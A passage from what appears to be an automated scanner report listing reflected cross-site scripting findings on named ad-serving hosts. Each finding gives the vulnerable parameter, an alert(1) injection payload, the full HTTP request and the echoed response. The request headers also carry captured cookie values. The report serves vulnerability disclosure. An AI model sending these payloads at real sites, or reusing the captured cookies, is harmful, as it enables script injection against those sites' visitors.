Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:10 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 17:54:29 GMT
ETag: "4fb837-cd0-49b281b7cbf40"
Accept-Ranges: bytes
Content-Length: 17689
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
var ckp = "http://img-cdn.mediaplex.com/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.jpg";
ckp = ckp.replace(/.*\/.*\/([0-9]*)_(
...[SNIP]...
adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=21007378077849c55";alert(1)//4a80fa0abd1\" target=\"_blank\">
...[SNIP]...

1.183. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba7e4"%3balert(1)//0517f93f112 was submitted in the mpvc parameter. This input was echoed as ba7e4";alert(1)//0517f93f112 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D6707832263625275206%26fcid%3D307892%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f38018c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D210073780778&mpt=1297647243&siteid=0&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=210073780778&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAEb3SXbnARddBWHfHSmrEEKLhlhNAAAAAI9bAwBkAAAAZAAAAAIAAABwUQIAh7wAAAEAAABVU0QAVVNEALQAlgBUAAAAxgUAAgMCAAUAAAAAShEJRQAAAAA.%2Fcnd%3D%21tBF7vwj4uwIQ8KIJGAAgh_kCKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFIAFAAWFRgA2hk%2Freferrer%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252Fdk.html%253Fdefaulting_ad%253Dx300f22.js%2526size_id%253D18%2526account_id%253D6005%2526site_id%253D12414%2526size%253D180x150%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000777384%252Fmnum%253D0000951470%252Fcstr%253D75633200%253D_4d58868a%252C6132271880%252C777384%255E951470%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D75633200%252Foptn%253D64%253Ftrg%253Dba7e4"%3balert(1)//0517f93f112 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:14 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 17:54:29 GMT
ETag: "4fb837-cd0-49b281b7cbf40"
Accept-Ranges: bytes
Content-Length: 17665
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
var ckp = "http://img-cdn.mediaplex.com/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.jpg";
ckp = ckp.replace(/.*\/.*\/([0-9]*)_(
...[SNIP]...
dvertising.com%2Fclick%2Fsite%3D0000777384%2Fmnum%3D0000951470%2Fcstr%3D75633200%3D_4d58868a%2C6132271880%2C777384%5E951470%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D75633200%2Foptn%3D64%3Ftrg%3Dba7e4";alert(1)//0517f93f112http://rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D
...[SNIP]...

1.184. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27cd5"><script>alert(1)</script>c7aa141f23a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D21008054256927cd5"><script>alert(1)</script>c7aa141f23a&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 22215
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=21008054256927cd5"><script>alert(1)</script>c7aa141f23a" TARGET="_blank">
...[SNIP]...

1.185. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51fd6"%3balert(1)//2297f36f9b7 was submitted in the mpck parameter. This input was echoed as 51fd6";alert(1)//2297f36f9b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D21008054256951fd6"%3balert(1)//2297f36f9b7&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:00 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 21999
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=21008054256951fd6";alert(1)//2297f36f9b7", "6781558", "<geozip/>
...[SNIP]...

1.186. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d29e"%3balert(1)//977552208d was submitted in the mpvc parameter. This input was echoed as 1d29e";alert(1)//977552208d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D210080542569&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f1d29e"%3balert(1)//977552208d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:11 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 21905
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
4D580CEF81F4C1%26orh%3Dcbsnews.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dwww.cbsnews.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D%26t%3D2011.02.14.01.34.36%26event%3d58%2f1d29e";alert(1)//977552208dhttp://rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa1
...[SNIP]...

1.187. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d4fe"><script>alert(1)</script>f4af9e30ca7 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-1915-16%2F4%3Fmpt%3D2011.02.14.01.34.36%26siteid%3D0%26adid%3D310692%26fcid%3D310692%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f39ba0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_U3%3D57988%26ir_DAP_I117%3D11450%26ir_DAP_I123%3D1059%26ir_DAP_I117%3D11450%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D210080542569&mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_U3=57988&ir_DAP_I117=11450&ir_DAP_I123=1059&ir_DAP_I117=11450&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=210080542569&mpvc=http%3A%252F%252Fadlog%252Ecom%252Ecom%252Fadlog%252Fe%252Fr%253D14588%2526sg%253D488020%2526o%253D250%253a503544%253a%2526h%253Dcn%2526p%253D2%2526b%253D55%2526l%253Den_US%2526site%253D162%2526pt%253D8301%2526nd%253D503544%2526pid%253D%2526cid%253D20031629%2526pp%253D100%2526e%253D%2526rqid%253D01phx1-ad-e19%3A4D580CEF81F4C1%2526orh%253Dcbsnews.com%2526oepartner%253D%2526epartner%253D%2526ppartner%253D%2526pdom%253Dwww.cbsnews.com%2526cpnmodule%253D%2526count%253D%2526ra%253D173.193.214.243%2526pg%253D%2526t%253D2011.02.14.01.34.36%2526event%253d58%252f6d4fe"><script>alert(1)</script>f4af9e30ca7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:08 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 18:45:33 GMT
ETag: "494a63-22a9-49a234e2dcd40"
Accept-Ranges: bytes
Content-Length: 22129
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D14588%26sg%3D488020%26o%3D250%3a503544%3a%26h%3Dcn%26p
...[SNIP]...
4D580CEF81F4C1%26orh%3Dcbsnews.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dwww.cbsnews.com%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3D%26t%3D2011.02.14.01.34.36%26event%3d58%2f6d4fe"><script>alert(1)</script>f4af9e30ca7http://rover.ebay.com/rover/1/711-118167-1915-16/4?mpt=2011.02.14.01.34.36&siteid=0&adid=310692&fcid=310692&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f39ba0d&ir_DAP_I5=1&
...[SNIP]...

1.188. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 61c78<script>alert(1)</script>60081d2e459 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J0553161c78<script>alert(1)</script>60081d2e459 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d73ef70&0&&4d4e2349&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07608=0105974ea67d21e1&G07608&0&4d73f5b7&0&&4d4e15ec&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_C07583=0105974ea67d21e1&C07583&0&4d74e384&0&&4d4f68ce&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d74ec12&0&&4d4e3c30&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_E08745=0105974ea67d21e1&E08745&0&4d7a314a&0&&4d54abd9&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_L09857=0105974ea67d21e1&L09857&0&4d7a5dc4&0&&4d550056&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A10863=0105974ea67d21e1&A10863&0&4d7b9c60&0&&4d54f31a&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H07710=0105974ea67d21e1&H07710&0&4d7bcd81&0&&4d55f92b&4c5cffb70704da9ab1f721e8ae18383d; udm_0=MLv3NTHtJjpr36zevo5cxP9XWiwe6sXs+ckYFUcWNFJqvISqiazmj0QAj4ie0hRHjgaCvFyVGRbIAi3mAcogYwmTs25nDPLkZuRnJb6xofNqWDZgKTYgIiyiY3uworqGjYrZuhhIiIPbkg+C3tkBj1bAI+RlDDdXZsADMREf3ny/rm2pgcRIp+UY3NJe1UfWQRrO/hwOk6HHfupD/KJAxLdco+gZsTIqCiHanzrhbOjbJNfe6EseO4cRrLuQqS+GtF+VEGnNUMiTVhZm/z83hMTUB3e23bcBLYzxrHLlNRxJZM12+OOygJR2OJUpCwWMDpGMmWLa7F+RBqPSMT+S66hDyHAR7PWb0VuluI9b4QAk6gqktIH4WCtmH6bTw73EoL5iUKlYN6Z9D6XgHIONjvbz3FccdmElidoQNElZgaHerov4GlDrNmtZQygm46bbAY6CeVtZz+RZ+BZL9YqlbN4bs/fDi5nbv2IQMBNwesF7XJgzfiyngMO309FYvUQ25MwPURyOGuDxC23xHBUsxk1TNvo0NzhtTfeZsrb65BOMVaGRmB/RjqWY0i/V/5iTj3HHc7ROo5AIS/xBovfDciRDExo0FwLr2SvE7DrfvUjHR5shA6bXIJXx7AXPduet7Ztd2Zhk+pGekgCS4DQpsrGYeBK7bbTFo5T/EwK9f1dnGtlUkrKYLnZIBhZDSsDkDYlYQnK2FJfrTWKVc2DpXdfT/9RCHPNZDlS0ZLg3ORKmpjak6CwjfV2Im4oRzrMSQ+W7dtUl/TeXIgQ0d7wlMvuIj5LGRM/rb5zeF79K84yxq+di6p3a/fJPGT42br8shRETc5KJ/6jMXRFMiqraZ5rrWL8PfD1mw4ZfVukmhjtvUfPQ8t7dbyMy8rsx99+FnPEOwvhdMC7u3h3OCIm7BwhWq5thjIbn3/oHj98YjmLABepXte1xK6KEDpdozbOfh+TZQ74/nQdE1mZmz2YotB3hFEEWlJik5M3h7NPKEbrtPOKP79rmu345k9iQ1vbxQhPyO/9r16xaF8aQAc/6UzNWm/+6+PNAebxEOVipIIuuPvkr9eur7h0wlmLuebfs4FRrjd4iZVNZYJgv8NERXegKSQm8qpNy5Zn5sO0AFbxhjhRR6dEaIKqShZ7tRYxX1I+etXNkpLWfmIjvq6vWAGC1BMZypV4PTYC/NuNBvOlTc908HOspCTSdDXYZg1IeTysTII2PDUnHq3Ed/LqMQNaRpjMtdu3yRSyPGdXEkQrfnpAuuFxq2OeARMb42nMC5YpTE/qs/d3dpre6qD7yIyrdpg5r6jaG2oQ2o7jqELpiS9HlemLdFz07twXeX8yeNSWqrtD6tHFepb4D8lCluppEds2BwuodubYd0a5kkXvZUki/+80a2xDw/rek20IuOt318YzbSB0kKPi479t0ie3TijnoCd+R2E4/qd4fpuqL; 